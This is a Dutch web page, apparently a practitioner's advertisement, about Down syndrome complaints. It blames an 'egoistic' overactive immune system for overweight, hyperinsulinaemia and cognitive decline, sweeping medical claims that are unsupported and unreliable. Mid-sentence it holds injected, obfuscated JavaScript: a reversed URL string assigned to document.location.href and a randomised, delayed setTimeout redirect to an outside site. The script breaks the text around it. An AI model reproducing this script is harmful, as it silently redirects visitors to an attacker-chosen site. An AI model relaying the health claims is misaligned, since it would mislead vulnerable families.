//Klachten bij Syndroom van Down
Klachten bij Syndroom van Down 2017-12-08T10:27:15+01:00

Klachten bij Syndroom van Down

Veel kinderen en volwassenen met het Syndroom van Down kampen met overgewicht en infecties. Dit komt omdat hun immuunsysteem continu actief is.

Een overactief immuunsysteem is egoïstisch. Het zorgt goed voor zich zelf ten koste van hormonale, neurologische en psychische systemen. Organen raken verwaarloosd en kwetsbaar, hun functioneren gaat langzaam, en in eerste instantie ongemerkt, achteruit. Ook hyperinsulinemie, een te kort aan spijsverteringsenzymen en vervetting zijn gevolgen van een overactief immuunsysteem.

Ook de hersenen kunnen verwaarloosd raken, met als gevolg concentratie, geheugen, verminderde leerprestaties en ontwikkeling: lichamelijke/motobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torische, sensorisch, cognitief en/of emotioneel.

Behandeling van klachten bij Syndroom van Down
Graag leg ik u tijdens een afspraak uit hoe het immuunsysteem werkt en wat je kunt doen om deze vicieuze cirkel te doorbreken. Hoe eerder voeding en leefstijl wordt aangepast, des te groter de kansen voor een gezonde ontwikkeling: lichamelijk, psychische en cognitief.

Meer weten? Neem gerust contact op voor meer informatie of het maken van een afspraak.